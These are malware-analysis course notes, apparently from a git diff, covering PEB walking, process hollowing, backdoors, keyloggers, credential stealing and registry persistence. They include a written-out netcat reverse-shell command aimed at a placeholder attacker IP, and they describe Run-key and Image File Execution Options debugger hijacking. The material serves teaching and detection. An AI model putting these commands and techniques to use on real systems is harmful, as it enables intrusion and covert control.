- Need to be able to find the address of (at least) these functions manually
- Possible to walk the data structures that Windows uses internally to find where the `DLL`s have been loaded into memory
- Once we find `KERNAL32.DLL`, we can walk the PE file structure, and find the address of `LoadLibrary` and `GetProcAddress`
- Can then use `LoadLibrary` and `GetProcAddress` to obtain access to other API functions
#### Thread Information Block
- Every thread on a Windows program has an associated TIB
- This is pointed to by the `FS` segment register
- This contains details about the current thread
- Including a pointer to the **Process Environment Block** (at an offset of `0x30`)
- `mov eax, fs:[0x30]`
- ```c
PEB *GetPEB()
{
_asm mov eax, fs:[0x30]
}
```
#### Modules List
- `PEB_LDR_DATA` structure points to a linked list containing each module
- List entry contains the module’s filename
- And the base address of where its been loaded
- Points to the start of the DOS file header
- Can search this linked list until we find the `DLL` of interest
- ```c
typedef struct _LDR_DATA_TABLE_ENTRY {
PVOID Reserved1[2];
LIST_ENTRY InMemoryOrderLinks;
PVOID Reserved2[2];
PVOID DllBase;
PVOID EntryPoint;
PVOID Reserved3;
UNICODE_STRING FullDllName;
BYTE Reserved4[8];
PVOID Reserved5[3];
union {
ULONG CheckSum;
PVOID Reserved6;
};
ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
```
##### Process Hollowing
- Here a normal program is loaded using `CreateProcess`
- But it is created in a suspended state using the `CREATE_SUSPEND` flag
- Original code is removed, and malware code is copied in
- Look out for calls to `ZuUnmapViewOfSection`, `SetThreadContext` and `ResumeThread`
@@ -0,0 +1,203 @@
# Malware Behaviour
### Downloaders
*Downloaders* simply download another piece of malware from the internet and execute it on the local system. Downloaders are often packaged with an exploit.
- Downloaders often use `URLDownloadToFileA`
- Followed by a called to `WinExec`
- To download and execute the new malware
- Are often called *droppers*
### Launchers
A launcher is any executable that installs malware for immediate or future covert execution.
- Often contains the malware payload embedded within the file
### Backdoors
A *backdoor* is a type of malware that provides an attacker with remote access to a victims machine. Backdoor code often implements a full set of capabilities so when using a backdoor, attackers don't need to download additional malware or code.
- Common variants
- Reverse Shells
- Remote Access Trojans (RATs)
- Botnets
- Commonly communicate over port 80 using `HTTP`
- `HTTP` is the most commonly used protocol for outgoing network traffic
- So it offers the malware the best chance of blending in to normal traffic
- Often provide a common set of functionality
- Manipulate registry keys
- Enumerate display windows
- Create directories
- Search for files
- Can determine the functionality provided by looking at the Windows API functions imported
#### Reverse Shell
A reverse shell is a connection that originates from an infected machine and provides attackers shell access to that machine.
- The simplest type of backdoor
- Provides attack with standard shell
- Offers same functionality as being logged into the machine
- Called a reverse shell because rather than the attacker connecting to the infected machine, the infected machine connects back to the attackers machine
- This is done as the victim's machine is often sitting behind a firewall blocking incoming traffic on most ports.
- Whereas outgoing traffic on random high number ports is often unblocked
- Either offered standalone or as part of a more sophisticated backdoor
##### Creating a reverse shell
###### Using Netcat
- Can be created quite simply using the `netcat` program
- This is done by setting up a listener on the attackers machine
- ```bash
nc -l -p 80
```
- Where `-l` is the listen flag and `-p` is the port flag to listen on 80
- Then netcat is run on the victims machine
- ```bash
nc <attackers ip> 80 -e cmd.exe
```
- The `-e` option is the program to execute over the connection once the connection is established
- Tying std input and std output from the program to the network socket
###### Using Windows API
This can be done in two ways: basic and multi-threaded
The **basic** method is popular as is easy to write and achieves the same thing.
It uses a call to `CreateProcess` and manipulates the `STARTUPINFO` structure.
1. First a socket to the remote server is established
2. That sockets standard streams are stored and spliced into `STARTUPINFO`
3. So that when `CreateProcess` is called with the `STARTUPINFO` passed in, standard input, output and error is piped to the attacker
The multithreaded approach is the same, except instead of tying the streams from command line directly to the socket, two threads sit inbetween (one for input, one for output) . These threads can be used to encrypt and decrypt data so is not sent in the clear.
- API calls `CreateThread` and `CreatePipe` should be looked for
- The two pipes are needed to redirect input and output to the thread
- Two threads are needed
- One for reading from the stdin pipe and writing to the socket
- One for reading from the socket and writing to the stdout pipe
- Then the `CreateProcess` method can be used to tie the standard streams to the pipes instead of directly to the socket.
### Remote Administration Tool (RAT)
- Often used in targeted attacks with a specific goal
- Typically communicate over common ports (e.g. 80 and 443)
- RAT server runs on the victim, implanted within malware
- Client runs remotely as a command and control unit operated by attacker
- Server connects back to the server to start a connection, then controlled by the client (the attacker)
![1652975874.png](img/1652975874.png)
Server will poll the client for new commands - there is not a permanent connection (as to not arouse suspicion)
### Botnet
- Botnet is a collection of compromised hosts (known as zombies)
- Controlled by a single entity through the use of a server
- Goal of a botnet to compromise as many hosts as possible
| RATs | BotNet |
| ------------------------------ | ------------------------------ |
| Typically control fewer hosts | Infect millions |
| Used in targeted attacks | Used in mass attack |
| Controlled on per-victim level | All zombies controlled as once |
### Credential Stealing
- Attackers will go to great lengths to steal credentials
- Three general approaches
- Programs that waits for a user to log in
- Programs that dump information stored in Windows (e.g password hashes)
- Programs that log keystrokes
#### Windows Login
- Windows enables you to extend the login mechanism
- In windows XP, this was done by *Graphical Identification* *and Authentication* (GINA) API
- Later windows versions use *Credential Provider*
- Possible to use these to install credential stealers by pretending to be a credential provider
Place a piece of code between `winlogin.exe` and `magina.dll`. By changing the `dll` to a malicious one.
##### Hash Dumping
- Another popular method of obtaining Windows credentials is *hash dumping*
- Aim is to copy the password hashes off system
- Don't get the password, but often get an equivalent
- Source code for several tools is available, often used by malware authors
- But also recognised by antivirus authors - therefore malware authors modify it slightly
### Keyloggers
- Intercepting Windows login or hash dumping will only provide details of the username and password to log into the computer
- Will not provide details of other resources
- Alternative approach is to log user key presses
- This will capture any password typed into the system
- Keyloggers can be implemented in both kernel space and user space
- Kernel based is very difficult to detected with user level applications
- Frequently used as part of a root kit
- Act as a keyboard driver to capture keystrokes bypasses user-space programs and protections
#### User-space keyloggers
- Windows API provides two ways to implement a keylogger in user-space
- Hooking - get windows to notify the malware every time a key is pressed
- Hooking typically makes use of `SetWindowsHookEx()`
- Can alter key presses as well
- Typically will include `.exe` which will intiate the hook function
- And a `dll` to handle the logging
- This `dll` is injected to other processes on the system
- Polling - malware interrogrates Windows to see if a specific key is pressed
- Make use of the `GetAsyncKeyState()` API function which returns a boolean
- All the keys are iterated through to see what specific key is pressed
- `GetForegroundWindow()` - shows window title
###### Identifying Keyloggers
- If malware wants to log all keys, then it will need to have names for keys like `[Num Lock]`, `[Page Up]`, `[Page Down]` or the cursor keys
- Might also have strings such as `qwerty...vbnm` present
## Persistence Mechanisms
- Various ways malware can get on a system
- But also needs to ensure it stays on the system for a long time
- Otherwise rebooting the system would be enough to clear it
- Various mechanisms are available for the malware to hook in
###### Via Registry
- Various places in the Windows Registry that can be used to install malware permanently
- Most popular is to register under:
- `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
- Tools available that can show all the programs that will automatically run on your system
- Note that the mechanisms available change as Windows develops
###### Image File Executable Options
- One option is the image File Execution Options in the registry
- Aimed at letting you debug a program
- Set at:
- `HKLM\Software\Microsoft\Windows NT\CurrentVersion\ImageFileExecution Options\{exe}`
- Can set a key here called debugger which contains the full path to the debugger (or your malware)
- Set this on a program that is likely to run and the malware will be launched when the program is run
- Can also be used for malware analysis
###### SVCHOST DLLs
- Malware often installed as a Windows service
- But typically requires implementing as a `exe`
- However, Windows provides `svchost.exe` that lets you implement a service as a `dll`
- Many Windows services are implemented as a `DLL` using `svchost.exe`
- Causes the malware to blend into the process list and registry better
Binary file not shown.

After

Width:  |  Height:  |  Size: 22 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 37 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 26 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 17 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 26 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 22 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 59 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 24 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 71 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 133 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 83 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 78 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 84 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 110 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 141 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 46 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 44 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 77 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 84 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 45 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 9.6 KiB